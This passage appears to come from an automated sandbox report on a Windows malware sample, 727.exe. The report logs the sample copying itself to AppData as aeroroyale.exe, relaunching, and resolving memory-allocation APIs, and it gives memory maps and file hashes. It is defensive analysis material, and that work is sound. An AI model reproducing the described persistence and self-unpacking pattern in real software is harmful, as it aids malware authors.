| Read Response | size = 30547, size_out = 30547 |
|
1 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Read Response | size = 1, size_out = 1 |
|
3 | |
| Read Response | size = 2, size_out = 2 |
|
1 | |
| Close Session | - |
|
1 |
Process #4: 727.exe
17
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\users\bgc6u8~1\appdata\local\temp\727.exe |
| Command Line | "C:\Users\BGC6U8~1\AppData\Local\Temp\727.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:32, Reason: Child Process |
| Unmonitor | End Time: 00:01:34, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbd0 |
| Parent PID | 0xa54 (c:\windows\system32\windowspowershell\v1.0\powershell.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BD4
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00140000 | 0x001a6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x00277fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x00280fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002b4fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002cffff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x002dffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002e0000 | 0x002e0000 | 0x002f5fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000300000 | 0x00300000 | 0x003fffff | Private Memory | rw |
|
|
|
- |
| 727.exe | 0x00400000 | 0x00426fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x00530fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x0113ffff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001140000 | 0x01140000 | 0x01155fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000011e0000 | 0x011e0000 | 0x011effff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x011f0000 | 0x014befff | Memory Mapped File | r |
|
|
|
- |
| winscard.dll | 0x5fc00000 | 0x5fc22fff | Memory Mapped File | rwx |
|
|
|
- |
| winspool.drv | 0x738c0000 | 0x73910fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75a00000 | 0x75a0bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75a90000 | 0x75bacfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x77360000 | 0x773eefff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x773f0000 | 0x77490fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x77500000 | 0x7765bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77760000 | 0x77833fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77840000 | 0x7797bfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x779a0000 | 0x779befff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77a80000 | 0x77a80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd7000 | 0x7ffd7000 | 0x7ffd7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
Module (17)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | USER32.dll | base_address = 0x77170000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x77760000 |
|
1 | |
| Get Handle | c:\users\bgc6u8~1\appdata\local\temp\727.exe | base_address = 0x400000 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x12fcd0 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x12fcf0 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77183f47 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetLastError, address_out = 0x777abb08 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeConsole, address_out = 0x7780bfde |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrlenW, address_out = 0x777ad9e8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpA, address_out = 0x77798c59 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x777abf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcess, address_out = 0x777acdcf |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessId, address_out = 0x777acac4 |
|
1 |
Process #5: 727.exe
21
0
| Information | Value |
|---|---|
| ID | #5 |
| File Name | c:\users\bgc6u8~1\appdata\local\temp\727.exe |
| Command Line | "C:\Users\BGC6U8~1\AppData\Local\Temp\727.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:32, Reason: Child Process |
| Unmonitor | End Time: 00:01:41, Reason: Self Terminated |
| Monitor Duration | 00:00:09 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbdc |
| Parent PID | 0xbd0 (c:\users\bgc6u8~1\appdata\local\temp\727.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BE0
0x
BEC
0x
BF0
0x
BF4
0x
C00
0x
C04
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00140000 | 0x001a6fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000001b0000 | 0x001b0000 | 0x001b0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001c0000 | 0x001c0000 | 0x001c0fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x001e4fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x00205fff | Private Memory | rwx |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x00225fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000230000 | 0x00230000 | 0x0023ffff | Private Memory | rwx |
|
|
|
- |
| pagefile_0x0000000000240000 | 0x00240000 | 0x00240fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00251fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000260000 | 0x00260000 | 0x0026ffff | Private Memory | rw |
|
|
|
- |
| windowsshell.manifest | 0x00270000 | 0x00270fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000270000 | 0x00270000 | 0x00270fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0037ffff | Private Memory | rw |
|
|
|
- |
| rpcss.dll | 0x00380000 | 0x003dbfff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00381fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000390000 | 0x00390000 | 0x00390fff | Pagefile Backed Memory | r |
|
|
|
- |
| cversions.1.db | 0x003a0000 | 0x003a3fff | Memory Mapped File | r |
|
|
|
- |
| cversions.2.db | 0x003a0000 | 0x003a3fff | Memory Mapped File | r |
|
|
|
- |
| {afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000001c.db | 0x003b0000 | 0x003cffff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000003d0000 | 0x003d0000 | 0x003d0fff | Pagefile Backed Memory | rw |
|
|
|
- |
| cversions.2.db | 0x003e0000 | 0x003e3fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x003f6fff | Pagefile Backed Memory | r |
|
|
|
- |
| 727.exe | 0x00400000 | 0x00426fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x004f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x00600fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x0120ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000001210000 | 0x01210000 | 0x012eefff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000012f0000 | 0x012f0000 | 0x012f1fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001300000 | 0x01300000 | 0x01300fff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000001300000 | 0x01300000 | 0x01301fff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000001310000 | 0x01310000 | 0x0131ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x01320000 | 0x015eefff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000015f0000 | 0x015f0000 | 0x016effff | Private Memory | rw |
|
|
|
- |
| {6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000009.db | 0x016f0000 | 0x0171ffff | Memory Mapped File | r |
|
|
|
- |
| {ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db | 0x01720000 | 0x01785fff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000017d0000 | 0x017d0000 | 0x0180ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001810000 | 0x01810000 | 0x0190ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000001910000 | 0x01910000 | 0x01d02fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000001d10000 | 0x01d10000 | 0x01e0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001e10000 | 0x01e10000 | 0x01f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000001f10000 | 0x01f10000 | 0x0200ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000002010000 | 0x02010000 | 0x0210ffff | Private Memory | rw |
|
|
|
- |
| winscard.dll | 0x5fc00000 | 0x5fc22fff | Memory Mapped File | rwx |
|
|
|
- |
| winspool.drv | 0x738c0000 | 0x73910fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x740e0000 | 0x74100fff | Memory Mapped File | rwx |
|
|
|
- |
| dwmapi.dll | 0x744c0000 | 0x744d2fff | Memory Mapped File | rwx |
|
|
|
- |
| uxtheme.dll | 0x747f0000 | 0x7482ffff | Memory Mapped File | rwx |
|
|
|
- |
| propsys.dll | 0x74830000 | 0x74924fff | Memory Mapped File | rwx |
|
|
|
- |
| comctl32.dll | 0x74970000 | 0x74b0dfff | Memory Mapped File | rwx |
|
|
|
- |
| rsaenh.dll | 0x75200000 | 0x7523afff | Memory Mapped File | rwx |
|
|
|
- |
| cryptsp.dll | 0x75460000 | 0x75475fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x758e0000 | 0x758ebfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrtremote.dll | 0x75980000 | 0x7598dfff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75a00000 | 0x75a0bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| cfgmgr32.dll | 0x75a60000 | 0x75a86fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75a90000 | 0x75bacfff | Memory Mapped File | rwx |
|
|
|
- |
| devobj.dll | 0x75bb0000 | 0x75bc1fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x75c90000 | 0x75d2ffff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| clbcatq.dll | 0x75e00000 | 0x75e82fff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x75fd0000 | 0x75fe8fff | Memory Mapped File | rwx |
|
|
|
- |
| wldap32.dll | 0x75ff0000 | 0x76034fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| shell32.dll | 0x760f0000 | 0x76d39fff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| setupapi.dll | 0x76dc0000 | 0x76f5cfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x77360000 | 0x773eefff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x773f0000 | 0x77490fff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x774a0000 | 0x774f6fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x77500000 | 0x7765bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77760000 | 0x77833fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77840000 | 0x7797bfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x779a0000 | 0x779befff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77a80000 | 0x77a80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd4000 | 0x7ffd4000 | 0x7ffd4fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdb000 | 0x7ffdb000 | 0x7ffdbfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdd000 | 0x7ffdd000 | 0x7ffddfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe | 152.00 KB |
MD5:
09825e3594c3b843b89e84650c05582b
SHA1: 0a9e192aa88a331cfa239c7dfba3d768fd76527c SHA256: 46a07c4a907ba444e952dde338443fda6cb0d52202d1f07c916114c38ca9629f SSDeep: 1536:7keo251Lv766vt7QtQwpl8FnKXXKnwgT4m2V9AadfIpZYKpOovk4xKLZT5:AeljLDP1syI0KHji4m25dwESvtMdT5 |
|
|
Host Behavior
File (1)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Move | C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe | source_filename = C:\Users\BGC6U8~1\AppData\Local\Temp\727.exe |
|
1 |
Module (18)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | USER32.dll | base_address = 0x77170000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x77760000 |
|
1 | |
| Get Handle | c:\users\bgc6u8~1\appdata\local\temp\727.exe | base_address = 0x400000 |
|
1 | |
| Get Filename | - | process_name = c:\users\bgc6u8~1\appdata\local\temp\727.exe, file_name_orig = C:\Users\BGC6U8~1\AppData\Local\Temp\727.exe, size = 260 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x12fcd0 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x12fcf0 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77183f47 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetLastError, address_out = 0x777abb08 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeConsole, address_out = 0x7780bfde |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrlenW, address_out = 0x777ad9e8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpA, address_out = 0x77798c59 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x777abf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcess, address_out = 0x777acdcf |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessId, address_out = 0x777acac4 |
|
1 |
Service (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Open Manager | database_name = SERVICES_ACTIVE_DATABASE |
|
1 |
System (1)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = Ticks, time = 154019 |
|
1 |
Process #6: aeroroyale.exe
17
0
| Information | Value |
|---|---|
| ID | #6 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:39, Reason: Child Process |
| Unmonitor | End Time: 00:01:41, Reason: Self Terminated |
| Monitor Duration | 00:00:02 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xbf8 |
| Parent PID | 0xbdc (c:\users\bgc6u8~1\appdata\local\temp\727.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
BFC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | r |
|
|
|
- |
| locale.nls | 0x00140000 | 0x001a6fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x00000000001b0000 | 0x001b0000 | 0x00277fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x00280fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x0038ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000390000 | 0x00390000 | 0x00390fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003a0000 | 0x003a0000 | 0x003b4fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003c0000 | 0x003c0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000003d0000 | 0x003d0000 | 0x003e5fff | Private Memory | rwx |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x003fffff | Private Memory | rwx |
|
|
|
- |
| 727.exe | 0x00400000 | 0x00426fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000430000 | 0x00430000 | 0x00530fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000540000 | 0x00540000 | 0x00555fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000600000 | 0x00600000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000610000 | 0x00610000 | 0x0120ffff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x01210000 | 0x014defff | Memory Mapped File | r |
|
|
|
- |
| winscard.dll | 0x5fc00000 | 0x5fc22fff | Memory Mapped File | rwx |
|
|
|
- |
| winspool.drv | 0x738c0000 | 0x73910fff | Memory Mapped File | rwx |
|
|
|
- |
| msasn1.dll | 0x75a00000 | 0x75a0bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75a10000 | 0x75a59fff | Memory Mapped File | rwx |
|
|
|
- |
| crypt32.dll | 0x75a90000 | 0x75bacfff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x75d30000 | 0x75dfbfff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76040000 | 0x760ebfff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x76d40000 | 0x76d8dfff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x77170000 | 0x77238fff | Memory Mapped File | rwx |
|
|
|
- |
| usp10.dll | 0x77240000 | 0x772dcfff | Memory Mapped File | rwx |
|
|
|
- |
| oleaut32.dll | 0x77360000 | 0x773eefff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x773f0000 | 0x77490fff | Memory Mapped File | rwx |
|
|
|
- |
| ole32.dll | 0x77500000 | 0x7765bfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x77760000 | 0x77833fff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x77840000 | 0x7797bfff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x779a0000 | 0x779befff | Memory Mapped File | rwx |
|
|
|
- |
| lpk.dll | 0x77a20000 | 0x77a29fff | Memory Mapped File | rwx |
|
|
|
- |
| apisetschema.dll | 0x77a80000 | 0x77a80fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ffd9000 | 0x7ffd9000 | 0x7ffd9fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | rw |
|
|
|
- |
Host Behavior
Module (17)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | USER32.dll | base_address = 0x77170000 |
|
1 | |
| Load | KERNEL32.dll | base_address = 0x77760000 |
|
1 | |
| Get Handle | c:\users\bgc6u8~1\appdata\local\temp\727.exe | base_address = 0x400000 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x12fcd0 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x12fcf0 |
|
1 | |
| Get Address | - | function = LoadLibraryA, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Get Address | - | function = GetProcAddress, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Get Address | - | function = VirtualAlloc, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Get Address | - | function = VirtualProtect, ordinal = 0, address_out = 0x12fd68 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77183f47 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetLastError, address_out = 0x777abb08 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FreeConsole, address_out = 0x7780bfde |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrlenW, address_out = 0x777ad9e8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = lstrcmpA, address_out = 0x77798c59 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x777abf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcess, address_out = 0x777acdcf |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetCurrentProcessId, address_out = 0x777acac4 |
|
1 |
Process #7: aeroroyale.exe
169
70
| Information | Value |
|---|---|
| ID | #7 |
| File Name | c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe |
| Command Line | "C:\Users\BGC6u8Oy yXGxkR\AppData\Local\Microsoft\Windows\aeroroyale.exe" |
| Initial Working Directory | C:\Users\BGC6u8Oy yXGxkR\Desktop\ |
| Monitor | Start Time: 00:01:39, Reason: Child Process |
| Unmonitor | End Time: 00:05:00, Reason: Terminated by Timeout |
| Monitor Duration | 00:03:21 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xc08 |
| Parent PID | 0xbf8 (c:\users\bgc6u8oy yxgxkr\appdata\local\microsoft\windows\aeroroyale.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | Medium |
| Username | F71GWAT\BGC6u8Oy yXGxkR |
| Enabled Privileges | SeChangeNotifyPrivilege |
| Thread IDs |
0x
C0C
0x
C14
0x
C20
0x
C24
0x
C28
0x
C2C
0x
C30
0x
C38
0x
D2C
0x
D30
0x
D34
0x
D38
0x
D3C
0x
DB8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| pagefile_0x0000000000020000 | 0x00020000 | 0x00020fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000030000 | 0x00030000 | 0x0012ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00133fff | Pagefile Backed Memory | r |
|
|
|
- |
